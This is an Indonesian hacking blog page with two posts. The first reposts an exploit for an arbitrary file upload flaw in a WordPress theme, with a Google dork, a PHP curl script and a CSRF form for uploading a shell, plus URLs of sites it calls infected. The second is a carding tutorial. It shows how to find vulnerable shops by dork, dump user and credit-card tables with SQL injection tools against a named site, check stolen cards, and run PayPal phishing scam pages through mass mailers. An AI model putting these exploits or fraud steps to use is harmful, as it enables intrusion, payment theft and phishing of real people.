Halaman

WordPress theme ColdFusion Arbitrary File Upload Vulnerability

Sabtu, 28 November 2015

#-Title: WordPress theme ColdFusion Arbitrary File Upload Vulnerability
#-Author: Smail Max / Bet0
#-Date: 10/31/2013
#- Vendor : themeforest. net
#- Link Download : themeforest. net/item/coldfusion-responsive-fullscreen-video-image-audio/4381748
#-Google Dork: inurl:wp-content/themes/ColdFusion
#- Tested on : Win7, Linux
#- Fixed in ??
////////////////////////////////////////////////////////////////////////////////////////////

Information of Bug : 

Bugtraq ID: 63523
Class: Input Validation Error
CVE: -
Remote: Yes
Local: No
Published: Nov 01 2013 12:00AM
Updated: Nov 01 2013 12:00AM
Credit: Bet0
When Vulnerable: {"status":"NOK", "ERR":"This file is incorect"}

Description : 
The ColdFusion Theme for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input. 

An attacker can exploit this issue to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access to the application; other attacks are also possible.


Solution:
Currently, we are not aware of any vendor-supplied patches.

-- Proof Of Concept --

With Remote Code :

<?php
$uploadfile="3xploi7.php";
$ch = curl_init("http://localcrot/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php");
curl_setopt($ch, CURLOPT_POST, true); 
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

With CSRF :

<form
action="http://localcrot/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php" method="post" enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="3xploi7ed !">
</form>

If Succesfully (with CSRF) : 

Shell Path : Here

Site Demo (Infected) :
http://www.laughinXgcowproductions.com/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php
http://www.alias-phXoto.com/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php
http://www.manueXl-portela.com/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php


Read more ...

Tutorial Carding Lengkap Terbaru 2015-2016

Sabtu, 28 November 2015
Sebelumnya saya berterimakasih nih ,.. Kepada  http://vendettablog07.blogspot.co.id/ Yang telah Membagikan Kirimannya yg keren banget ini :D
kenapa saya kopas? -_- karena saya tak sempet NULIS Artikel Ini ,. soalnya kesibukan Di DUNIA nyata :3 ,... Nanti klo udah Liburan gituh!! ne aku akan SHARE yg terbru lagi :D 


# TUTORIAL CARDING LENGKAP MENGGUNAKAN BERBAGAI APLIKASI CARDING SEPERTI GREENOX,SQL DUMPER,HAVIJ,SQL DB,PYTHON, Dan masih banyak lagi 
Ywdah Cekidot gan !!! 





1.Alat Dan Bahan

Berikut Alat-Alat Carding Mass...

Ada Juga Tutorialnya Bentuk Pdf...




Di Download Aja Ea... :D:D:D


ALat-ALat Carding:

1.Tutorial Carding Disini

2.Havij Portable Disini

3.Simple Scan Dork Disini

4.Grenox Dork Scanner Disini

5.SQLI-DB Disini

6. Dork 1 Klik Disini Dork 2 Disini Dork 3 Disini Dork 4 Disini

7.Methode Order Western Union Disini

8.Methode All Site Disini

9.SQL MAP Disini

10.Phyton Untuk Support SQL MAP Disini


Untuk Mencari CC/PP Gunakan Salah Satu Tools...


Pilih Diantara Tools yang mungkin anda suka atau anda sudah pahami cara menggunakannya...

Pilih Tool Antara Havij,SQL MAP,Atau SQL Dumper...


Untuk Mencari Web vuln Pake tools diantara SQLi-DB atau Gr3nox Dork Scanner..

Sebelumnnya Saya Sudah memposting cara menggunakan SQLi-DB..


Untuk DOrk Saya Sudah Menyiapkan Bayak Diatas Dan Anda Tinggal Download Dan Langsung Praktekkan..

Jika Anda Ingin Mencheck CC/PP anda Yang Sudah Anda Dapat Dari Hasil Carding Anda Bisa Menchecknya Di Site dibawah ini..

Tetapi Anda Harus Membeli Invite Code Dan Juga Crenya...

Checker CC:

1.Ipro.Club Disini

2.SayaPro Disini

Checker PP:

Nonong Crew Disini

Untuk Anda Yang Mendapatkan Paypal terlebih Dahulu Anda Harus MengHash Kode Yang Anda Dapat dan Menyusunnya Sesuai Email..


Untuk Hash Type MD5 Disini

Untuk Hash Type SHA1 Disini

Semoga Sukses :D :D :D


2.Cara Mencari WebVuln

Cara Mencari Webvuln Untuk Carding Menggunakan SQLI-DB


Turor Dari Saya Ini Bukan Seperti Turtor Yang Di Berikan Orang yang hanya begitu singkat saja atau Sekilas...

saya akan mengajarkan anda cara mencari webvuln untuk Carding...

CHECK IT OUT

Pertama Download Disini SQLI-DB

Tutorial:
1.Cari Dork Anda Yang Isi Dorknya Ada Webvuln..

Untuk Download Dorknya Disini Dan Disini

2.Setting SQLI-DBnya

Misalnya:

Search Engine:GOOGLE

Remove Duplicate:YES

Deep Scan:YES

Proxy:YES

Total Result:(Terserah Loe Ngisi Berapa)

3.Masukkan Dork Tersebut Ke dalam Kolom Search Di SQLI-DB

4.Klik Scan(Klik Gambar LUP)

5.Klik Vulnerable Untuk Melihat Site Yang Vuln

6.Selesai Tinggal Scan Di Havij Hapus %27 yang berada di akhir sitenya..






3.SCAN

Bahan - Bahan :

1. Havij 1.16 Pro ( comot DISINI )

2.Web Vuln

Oke langsung aja caranya :

1. Siapkan Tool Havij 1.16 Pro
2. Lu cari dah Web OLshop yang vuln dengan menggunakan dork yang disediakan


Untuk mencari WEB yang Vuln, Bisa pakai Gr3EnoX .. Caranya: Pertama, Pada Kolom"DORK" pastekan Dork yang ingin di Scan.. Kedua, klik "SEARCH" ..Tunggu hingga proses scanning selesai.. Web yang TIDAK VULN , ada di kolom sebelah KIRI .. Dan Web yang VULN, akan muncul di kolom sebelah KANAN

ATAU , BISA JUGA SECARA MANUAL . SIMAK NIH...


NB: Untuk mencari web OLshop yang vuln, kita tinggal menambahkan tanda ' (kutip 1) di belakang URL, Misalkan gue mau cari web vuln dengan dork "inurl:merchandise/index.php?cat=" lu paste aja ntu dork di mbah gugel.. nnti akan banyak web OLshop.. Lu cek satu per satu dengan menambahkan tanda kutip tadi di setiap belakang URLnya..




Nah.. tuh, udah gue tambahin tanda kutip di belakang Urlnya.. jika muncul seperti ini





Berarti Web itu Vuln ..

3. Gue ambil target http://www.pikerpress.com/merchandise/index.php?cat=book







4. Klik "analyze" .. kalo udah ada tulisan "CurrentDB=" berarti proses analyze sudah selesai.. kalo sudah selesai, Klik kolom "Tables" diatas.. akan muncul gambar seperti ini






5. Ceklis kotaknya, lalu klik "Get Tables", jika sudah, tampilan nya jadi benini









6. untuk mencari data-data Credit Card, biasanya terdapat pada tables "Users" , "Consumers" atau yang lain nya.. sekarang, kita coba dari tables "Users".. ceklis kolom kecil disebelah tulisan "Users", lalu klik "Get Columns" .. maka akan seperti ini









7. Nahh, itu ada informasi ID, Username, Password.. Disini kita apes, gaada ColumnsCreditCard :'v kalo kalian beruntung, pasti terdapat informasi Creditcard, Paypal, dll.. tapi kita coba dulu ID , Username, Password.. cara mendapatkan data nya, kita ceklis Id, Username, Password, Lalu Klik "Get Data" .. kali ini gue mau liat semuanya, maka yang diceklis adalah (liat gambar dibawah)









8. Kolom yang disebelah kanan Itu adalah kolom untuk menampilkan data-data yang kita inginkan (gue cuma dapet 1 -_- ) .. kalo kita mau lihat semua datanya, klik "Save DATA" dan formatnya adalah HTML.. Gimana cara buka file yang formatnya HTML ? gampang bro.. lu tinggal Klik Kanan >> Open With >> Google Chrome (ini gak harus google chrome juga sih .. pokoknya openwith browser yang yg udah terinstall)



Free Dork VVIP , CLICK HERE
udah lama saya juga tidak memPosting di blog...

Kali ini saya akan MemPosting bagaimana cara Membuat SCAMPAGE untuk menyedot Paypal dan Card Creditnya Sekaligus...





Cara SCAMING




ALAT DAN BAHAN:


?CPANELyang SERVERnya tidak DOWN
?SCRIPT ada Di Bawah
?Mailer/SMTP
?Letter
?MaiList (Dump Sendiri)

Saya membuat server tidak down supaya RESULTnya Nanti Masuk Ke Email Anda....












SCRIPT SCAMPAGE 1 DOWNLOAD DISINI

SCRIPT SCAMPAGE 2 DOWNLOAD DISINI

SCRIPT SCAMPAGE 3DOWNLOAD DISINI

LETTER PAYPAL DOWNLOAD DISINI

MAILER 1 DISINI Password Mailer: Gujjar MAILER 2 DISINI


Tentunya Anda Harus Memiliki Cpanel Dan juga DOMAIN Gratisan Bisa Tapi saya sarankan domain Yang Premium Misalnya Domain .com,net,org

Terserah agan dah...

1.Upload Script Scampagenya Ke Cpanel Lalu EXTRACT

2.Isi Email anda di Folder CMD>__YourEMail__.php

3.Test Lihat Scampage anda Lihat Di Domain Anda

4.Jika Result Masuk Nahh... Tinggal Nebar Dah....



Cara Menyebar:

1.Buka Mailer Dan Pastinya Anda Sudah Mendownload Letternya

2.Ganti Link http://adf.ly/1KUAAV dengan Link Scampage /domain scampage anda Caranya CTRL+F tentunya kan karena itu letter berbentuk HTML bukanya dengan notepad dah...

3.Copy Semua Isi Letternya Masukkan Ke Letter di Mailernya...

4.Saya Lupa Tentunya anda Harus Memiliki MAILIST

Cara Mencari MAILIST dengan Cara Mendumpnya dengan HAVIJ atau SQLI-DUMPER

Mailist itu adalah daftar Email Yang banyak Atau Bejibun :v :v :v




Kalau Sudah Tinggal Klik Send Message Dah...

Dan Tinggal Tunggu RESULTnya masukk....

Pastikan Letternya Masuk Email..

Jika gagal Anda Terpaksa Membeli SMTP untuk Send Letter Dengan EMAIL SENDER DELUXE...
Nanti Saya Akan MemPosting Cara Memakai EMail Sender Deluxe...
Read more ...